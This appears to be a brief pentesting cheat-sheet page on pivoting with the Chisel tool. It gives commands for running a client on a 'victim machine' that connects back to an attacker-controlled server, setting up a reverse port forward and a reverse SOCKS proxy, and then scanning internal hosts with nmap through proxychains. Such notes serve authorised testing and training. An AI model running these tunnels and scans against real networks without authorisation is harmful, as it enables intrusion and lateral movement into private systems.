Chisel
Download chisel here: https://github.com/jpillora/chisel
Start a client on the victim machine
./chisel client <attacker ip> <chisel server port> R:443:127.0.0.1:443 Start a server on the attacker machine
./chisel server -p <chisel server port> --reverseSOCKS proxy with Chisel on Windows hosts
Start a server on the attacker machine
chisel server --port <chisel server port> --socks5 --reverseStart a client on the victim machine
chisel.exe client --max-retry-count 1 <attacker ip>:<chisel server port> R:socksAdd the following line to /etc/proxychains.conf
# chisel
# 1080 is the default port of the chisel reverse proxy
socks5 127.0.0.1 1080Run commands through Chisel from attacker machine
# Be selective in ports because it takes a while
proxychains -q nmap -sT -Pn -p <ports> <internal ip to be scanned>Last updated